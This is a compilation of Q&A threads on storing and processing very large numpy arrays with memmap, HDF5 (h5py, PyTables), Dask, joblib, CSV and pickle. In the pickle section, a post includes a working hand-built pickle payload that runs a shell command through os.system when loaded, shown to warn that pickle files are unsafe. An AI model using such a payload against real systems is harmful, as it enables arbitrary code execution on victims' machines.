There are a bunch of questions on SO that appear to be the same, but they don't really answer my question fully. I think this is a pretty common use-case for computational scientists, so I'm creating a new question.
QUESTION:
I read in several small numpy arrays from files (~10 MB each) and do some processing on them. I want to create a larger array (~1 TB) where each slice along one dimension contains the data from one of these smaller files. Any method that tries to create the whole larger array (or a substantial part of it) in RAM is not suitable, since it floods the RAM and brings the machine to a halt. So I need to be able to initialize the larger array and fill it in small batches, so that each batch gets written to the larger array on disk.
I initially thought that numpy.memmap is the way to go, but when I issue a command like
mmapData = np.memmap(mmapFile,mode='w+', shape=(large_no1,large_no2))
the RAM floods and the machine slows to a halt.
After poking around a bit it seems like PyTables might be well suited for this sort of thing, but I'm not really sure. Also, it was hard to find a simple example in the doc or elsewhere which illustrates this common use-case.
If anyone knows how this can be done using PyTables, or if there's a more efficient/faster way to do this, please let me know! Any references to examples are appreciated!
That's weird. np.memmap should work. I've been using it with 250 GB of data on a machine with 12 GB of RAM without problems.
Does the system really run out of memory at the very moment the memmap file is created? Or does it happen later in the code? If it happens at file creation, I really don't know what the problem would be.
When I started using memmap I made some mistakes that led to running out of memory. For me, something like the code below should work:
import numpy as np

mmapData = np.memmap(mmapFile, mode='w+', shape=(smallarray_size, number_of_arrays), dtype='float64')
for k in range(number_of_arrays):
    smallarray = np.fromfile(list_of_files[k])  # list_of_files is the list of file names
    smallarray = do_something_with_array(smallarray)
    mmapData[:, k] = smallarray
It may not be the most efficient way, but it seems to me that it would have the lowest memory usage.
P.S.: Be aware that the default dtypes of memmap (uint8) and fromfile (float64) are different!
HDF5 is a C library that can efficiently store large on-disk arrays. Both PyTables and h5py are Python libraries on top of HDF5. If you're using tabular data then PyTables might be preferred; if you have just plain arrays then h5py is probably more stable/simpler.
There are out-of-core numpy array solutions that handle the chunking for you. Dask.array would give you plain numpy semantics on top of your collection of chunked files (see docs on stacking.)
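For the batch-fill use case in the question, here is a minimal h5py sketch (not from the answers above; it reuses the placeholder names large_no1, large_no2, list_of_files, and do_something_with_array from the question, and the file/dataset names are made up):
import numpy as np
import h5py

# Create a (large_no1, large_no2) float64 dataset on disk; only the chunks
# that actually get written are materialized, so RAM usage stays small.
with h5py.File("big_array.h5", "w") as f:
    dset = f.create_dataset("data", shape=(large_no1, large_no2),
                            dtype="float64", chunks=True)
    for k, fname in enumerate(list_of_files):
        small = np.fromfile(fname, dtype="float64")
        small = do_something_with_array(small)
        dset[:, k] = small  # one column-sized batch written straight to disk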
Related
I am searching for the best possible solution for storing large dense 2D matrices of floating-point data, generally float32 data.
The goal would be to share scientific data more easily from websites like the Internet Archive and make such data FAIR.
My current approaches (listed below) fall short of the desired goal, so I thought I might ask here, hoping to find something new, such as a better data structure. Even though my examples are in Python, the solution does not need to be in Python. Any good solution will do, even one in COBOL!
CSV-based
One approach I tried is to store the values as compressed CSVs using pandas, but this is excruciatingly slow, and the resulting compression is not exactly optimal (generally about 50% of the plain CSV size on the data I tried it on, which is not bad but not sufficient to make this viable). In this example I am using gzip. I have also tried LZMA, but it is generally much slower and, at least on the data I tried it on, it does not yield a significantly better result.
import pandas as pd
my_data: pd.DataFrame = create_my_data_doing_something()
my_data.to_csv("my_data_saved.csv.gz")
NumPy Based
Another solution is to store the data in a NumPy array and then compress it on disk.
import numpy as np
my_data: np.ndarray = create_my_data_doing_something()
np.save("my_data_saved.npy", my_data)
and afterwards
gzip -k my_data_saved.npy
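A variant of this approach (not in the original post) is NumPy's own compressed container, which does the save and the compression in one step:
import numpy as np

my_data: np.ndarray = create_my_data_doing_something()
# savez_compressed writes a zip-deflated .npz archive, roughly equivalent
# to np.save followed by gzip.
np.savez_compressed("my_data_saved.npz", my_data=my_data)
# Load it back (np.load returns a dict-like object keyed by array name).
my_data_loaded = np.load("my_data_saved.npz")["my_data"]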
Numpy with H5
Another possible format is HDF5, but as shown in the benchmark below it does not do better than plain NumPy.
import h5py

with h5py.File("my_data_saved.h5", 'w') as hf:
    hf.create_dataset("my_data_saved", data=my_data)
Issues in using the Numpy format
While this may be a good solution, we limit the usability of the data to people who can use Python. Of course, that is a vast pool of people; still, in my circles many biologists and mathematicians abhor Python and prefer to stick to MATLAB and R (and therefore would not know what to do with a .npy.gz file).
Pickle
Another solution, as correctly pointed out by @lojza, is to store the data in a pickle object, which may also be compressed on disk. In my benchmarks (see below), pickle achieves a compression ratio comparable to the one obtained with NumPy.
import pickle
import compress_pickle
import numpy as np

my_data: np.ndarray = create_my_data_doing_something()
# Uncompressed pickle
with open("my_data_saved.pkl", "wb") as f:
    pickle.dump(my_data, f)
# Compressed version
compress_pickle.dump(my_data, "my_data_saved.pkl.gz")
Issues in using Pickle format
The issue with using Pickle is two-fold: first, the same Python-dependency issue discussed above. Second, there is a significant security issue: the Pickle format can be used for arbitrary-code-execution exploits. People should be wary of downloading random pickle files from the internet (and here the goal is precisely to get people to share datasets on the internet).
import pickle
# Build the exploit
command = b"""cat flag.txt"""
x = b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R." % command
# Test it (pickle.loads takes bytes; pickle.load expects a file object)
pickle.loads(x)
Benchmarks
I have run benchmarks to provide a baseline to improve on. They show that, generally, NumPy is the best-performing choice, and to my knowledge its format should not carry any security risk. It follows that a compressed NumPy array is currently the best contender; please help me find a better one!
Examples
To share some actual use cases of this relatively simple task, here are a couple of graph embeddings of the complete OBO Foundry graph. If there were a way to make these files smaller, sharing them would be significantly easier, allowing for more reproducible experiments and accelerating research in bio-ontologies (for this specific data) and other fields.
OBO Foundry embedded using CBOW
OBO Foundry embedded using TransE
What other approaches may I try?
I'm trying to write a program that parses data from a (very) large file consisting of uniform rows, each containing 8 sets of 16-bit hex values. For instance, one row would look like this:
edfc b600 edfc 2102 81fb 0000 d1fe 0eff
The data files are expected to be anywhere between 1 and 4 TB, so I wasn't sure what the best approach would be. If I load this file using Python's open() function, could this turn out badly? I'm worried about how much of an impact this will have on my memory if I'm loading such a large file just to index through it. Alternatively, if there's a method I can use to load just the section of data I want from the file, that would be ideal, but as far as I know, I don't think that's even possible. Is this correct?
Anyway, some idea of how to approach this very general problem would be much appreciated!
Found an answer on GitHub. In numpy, there's a function called memmap that works for what I'm doing.
samples = np.memmap("hexdump_samples", mode="r", dtype=np.int16)[100:159]
This didn't seem to cause any issues with the smaller data set I was using, and as far as I understand it shouldn't cause any memory issues with the larger files either, since memmap only maps the file into memory rather than loading it.
It depends on your computer hardware and how much RAM you have. Python is an interpreted language with a bunch of safeguards, but I wouldn't risk trying to open that file with Python. I would recommend using C or C++; they are good with large amounts of data and memory management. You can then parse the data in bite-sized chunks, maybe 16 MB per chunk. Python is extremely slow and memory-inefficient compared to C.
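For illustration only (not part of the answer above), the same chunked-reading idea can be sketched in Python, assuming the suggested 16 MB chunk size and a hypothetical process_chunk function; a real parser would also need to handle rows split across chunk boundaries:
CHUNK_SIZE = 16 * 1024 * 1024  # 16 MB per read, as suggested above

def process_chunk(chunk: bytes) -> None:
    # Placeholder: parse the hex text contained in `chunk` here.
    pass

with open("hexdump_samples", "rb") as f:
    while True:
        chunk = f.read(CHUNK_SIZE)
        if not chunk:
            break
        process_chunk(chunk)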
I am using numpy and trying to create a huge matrix.
While doing this, I receive a memory error
Because the matrix itself is not important, I will just show an easy way to reproduce the error.
a = 10000000000
data = np.array([float('nan')] * a)
Not surprisingly, this throws a MemoryError.
There are two things I would like to point out:
I really need to create and use a big matrix
I think I have enough RAM to handle this matrix (I have 24 GB of RAM)
Is there an easy way to handle big matrices in numpy?
Just to be on the safe side, I previously read these posts (which sound similar):
Very large matrices using Python and NumPy
Python/Numpy MemoryError
Processing a very very big data set in python - memory error
P.S. Apparently I have some problems with multiplying and dividing numbers, which made me think I had enough memory. So I think it is time for me to go to sleep, review my math, and maybe buy some memory.
Maybe in the meantime some genius will come up with an idea for how to actually create this matrix using only 24 GB of RAM.
Why I need this big matrix
I am not going to do any manipulations with this matrix. All I need to do with it is to save it into pytables.
Assuming each floating point number is 4 bytes, you'd have
(10000000000 * 4) / (2**30.0) = 37.25290298461914
or about 37.3 gigabytes that you need to hold in memory, so I don't think 24 GB of RAM is enough. (NumPy's default float is actually 8 bytes per element, which would double that to about 74.5 GB.)
If you can't afford creating such a matrix, but still wish to do some computations, try sparse matrices.
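For example (a sketch, not from the original answer; the shape and values are made up), a mostly-empty matrix of huge logical size fits comfortably in a SciPy sparse structure:
import scipy.sparse as sp

# A 100000 x 100000 logical matrix; only explicitly set entries use memory.
m = sp.lil_matrix((100000, 100000), dtype='float64')
m[0, 0] = 1.0
m[42, 7] = 3.14
csr = m.tocsr()  # convert to CSR for fast arithmetic and slicing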
If you wish to pass it to another Python package that uses duck typing, you may create your own class with __getitem__ implementing dummy access.
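A minimal sketch of that duck-typing idea (the class and its behavior are invented for illustration):
class DummyMatrix:
    """Pretends to be a huge NaN-filled matrix without allocating it."""
    def __init__(self, shape):
        self.shape = shape
    def __getitem__(self, index):
        # Every lookup just returns NaN instead of reading real storage.
        return float('nan')

data = DummyMatrix((10000000000,))
print(data[12345])  # nan, with essentially no memory used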
If you use the PyCharm editor for Python, you can change the memory settings in
C:\Program Files\JetBrains\PyCharm 2018.2.4\bin\pycharm64.exe.vmoptions
Lowering PyCharm's own memory allocation in this file leaves more memory free for your program. You need to edit these lines:
-Xms1024m
-Xmx2048m
-XX:ReservedCodeCacheSize=960m
For example, you can change them to -Xms512m and -Xmx1024m, and then your program should work,
but it will affect debugging performance in PyCharm.
I've currently got a project running on PiCloud that involves multiple iterations of an ODE solver. Each iteration produces a NumPy array of about 30 rows and 1500 columns, with each iteration's results appended to the bottom of the array of the previous results.
Normally, I'd just let these fairly big arrays be returned by the function, hold them in memory, and deal with them all at once. Except PiCloud has a fairly restrictive cap on the size of the data that can be returned outright by a function, to keep down transmission costs. That would be fine, except it means I'd have to launch thousands of jobs, each running one iteration, with considerable overhead.
It appears the best solution to this is to write the output to a file, and then collect the file using another function they have that doesn't have a transfer limit.
Is my best bet to do this just dumping it into a CSV file? Should I add to the CSV file each iteration, or hold it all in an array until the end and then just write once? Is there something terribly clever I'm missing?
Unless there is a reason for the intermediate files to be human-readable, do not use CSV, as this will inevitably involve a loss of precision.
The most efficient is probably tofile (doc), which is intended for quick dumps of data to disk when you know all of the attributes of the data ahead of time.
For platform-independent, but numpy-specific, saves, you can use save (doc).
Numpy and scipy also have support for various scientific data formats like HDF5 if you need portability.
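For instance (a sketch, not from the answer; run_ode_iteration, num_iterations, and the file names are placeholders), each iteration could be dumped with save and the pieces stacked later during collection:
import numpy as np

# Write one ~30 x 1500 array per iteration as a separate .npy file.
for i in range(num_iterations):
    result = run_ode_iteration(i)  # placeholder for one solver step
    np.save(f"iteration_{i:05d}.npy", result)

# Later, in the collection step, stack everything back into one array.
all_results = np.vstack([np.load(f"iteration_{i:05d}.npy")
                         for i in range(num_iterations)])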
I would recommend looking at the pickle module. The pickle module allows you to serialize python objects as streams of bytes (e.g., strings). This allows you to write them to a file or send them over a network, and then reinstantiate the objects later.
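A minimal sketch of that round trip (the file name and array contents are made up):
import pickle
import numpy as np

results = np.random.rand(30, 1500)

# Serialize to disk...
with open("results.pkl", "wb") as f:
    pickle.dump(results, f)

# ...and reinstantiate later (or on another machine).
with open("results.pkl", "rb") as f:
    results_again = pickle.load(f)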
Try Joblib - Fast compressed persistence
One of the key features of joblib is its ability to persist arbitrary Python objects and read them back very quickly. It is particularly efficient for containers that do their heavy lifting with numpy arrays. The trick to achieving great speed is to save the numpy arrays in separate files and load them via memmapping.
Edit:
Newer (2016) blog entry on data persistence in Joblib
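A minimal sketch of that usage (assuming joblib is installed; the file names and array are placeholders):
import numpy as np
import joblib

arr = np.random.rand(30, 1500)

# Persist with compression; joblib stores the numpy buffers efficiently.
joblib.dump(arr, "results.joblib", compress=3)
arr_again = joblib.load("results.joblib")

# Uncompressed dumps can instead be loaded via memory-mapping:
joblib.dump(arr, "results_raw.joblib")
arr_mapped = joblib.load("results_raw.joblib", mmap_mode="r")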
There seems to be many choices for Python to interface with SQLite (sqlite3, atpy) and HDF5 (h5py, pyTables) -- I wonder if anyone has experience using these together with numpy arrays or data tables (structured/record arrays), and which of these most seamlessly integrate with "scientific" modules (numpy, scipy) for each data format (SQLite and HDF5).
Most of it depends on your use case.
I have a lot more experience dealing with the various HDF5-based methods than traditional relational databases, so I can't comment too much on SQLite libraries for python...
At least as far as h5py vs pyTables goes, they both offer very seamless access via numpy arrays, but they're oriented towards very different use cases.
If you have n-dimensional data that you want to quickly access arbitrary index-based slices of, then it's much simpler to use h5py. If you have data that's more table-like, and you want to query it, then pyTables is a much better option.
h5py is a relatively "vanilla" wrapper around the HDF5 libraries compared to pyTables. This is a very good thing if you're going to be regularly accessing your HDF file from another language (pyTables adds some extra metadata). h5py can do a lot, but for some use cases (e.g. what pyTables does) you're going to need to spend more time tweaking things.
pyTables has some really nice features. However, if your data doesn't look much like a table, then it's probably not the best option.
To give a more concrete example, I work a lot with fairly large (tens of GB) 3 and 4 dimensional arrays of data. They're homogenous arrays of floats, ints, uint8s, etc. I usually want to access a small subset of the entire dataset. h5py makes this very simple, and does a fairly good job of auto-guessing a reasonable chunk size. Grabbing an arbitrary chunk or slice from disk is much, much faster than for a simple memmapped file. (Emphasis on arbitrary... Obviously, if you want to grab an entire "X" slice, then a C-ordered memmapped array is impossible to beat, as all the data in an "X" slice are adjacent on disk.)
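A rough sketch of that access pattern (the file and dataset names are made up, and the array here is tiny compared to the real use case):
import numpy as np
import h5py

# Write a chunked, compressed 3-D dataset; chunks=True lets h5py pick a chunk shape.
with h5py.File("volume.h5", "w") as f:
    f.create_dataset("vol", data=np.random.rand(100, 256, 256),
                     chunks=True, compression="gzip")

# Later: read only a small arbitrary sub-block from disk.
with h5py.File("volume.h5", "r") as f:
    block = f["vol"][50:60, 100:200, 30:40]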
As a counter-example, my wife collects data from a wide array of sensors that sample at minute to second intervals over several years. She needs to store and run arbitrary queries (and relatively simple calculations) on her data. pyTables makes this use case very easy and fast, and still has some advantages over traditional relational databases. (Particularly in terms of disk usage and the speed at which a large (index-based) chunk of data can be read into memory.)
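A sketch of what that looks like on the pyTables side (the table layout and query are invented for illustration):
import tables

class Reading(tables.IsDescription):
    timestamp = tables.Float64Col()
    sensor_id = tables.Int32Col()
    value = tables.Float32Col()

with tables.open_file("sensors.h5", "w") as h5:
    table = h5.create_table("/", "readings", Reading)
    # ... append rows from the sensors here ...
    table.flush()

with tables.open_file("sensors.h5", "r") as h5:
    table = h5.root.readings
    # In-kernel query: only matching rows are read from disk.
    hot = [row["value"] for row in table.where("(sensor_id == 3) & (value > 100.0)")]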